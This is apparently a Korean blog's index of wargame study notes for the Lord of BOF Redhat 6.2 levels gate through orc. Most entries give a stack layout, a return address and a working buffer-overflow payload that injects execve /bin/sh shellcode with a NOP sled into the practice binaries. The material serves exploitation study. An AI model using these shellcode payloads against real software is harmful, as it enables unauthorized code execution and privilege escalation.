본문 바로가기

Wargames

LOB Redhat 6.2 - orc orc - egghunter + buffer hunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc44Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'` Using argv[1] address 더보기
LOB Redhat 6.2 - goblin goblin - egghunterStack : i[4] + buffer[40] + sfp[4] + ret[4]return address : 0xbffffc01Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using buffer address 더보기
LOB Redhat 6.2 - cobolt cobolt - small buffer + stdinStack : buffer[16] + sfp[4] + ret[4]return address : 0xbffffeb9Payload : (python -c 'print "A"*20 + "\xb9\xfe\xff\xbf"';cat) | ./goblinEnvironment Variable : export shell=`python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`getenv.c : Using Environment Variable 더보기
LOB Redhat 6.2 - gremlin *이 글은 절대 강좌글이 아니라 본인이 공부한 내용을 정리하고 적어놓은 글임을 알립니다 gremlin - small bufferStack : buffer[16] + sfp[4] + ret[4]return address : 0xbffffbeePayload : ./cobolt `python -c 'print "A"*20 + "\xee\xfb\xff\xbf" + "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'` Using argv[1] address 더보기
LOB Redhat 6.2 - gate gate - simple BOFStack : buffer[256] + sfp[4] + ret[4]return address : 0xbffff928Payload : ./gremlin `python -c 'print "\x90"*137 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*100 + "\x28\xf9\xff\xbf"'` Using buffer address 더보기
Easy Unpack - 100pt 보호되어 있는 글입니다. 더보기
Easy Keygen - 100pt 보호되어 있는 글입니다. 더보기
Easy Crack - 100pt 보호되어 있는 글입니다. 더보기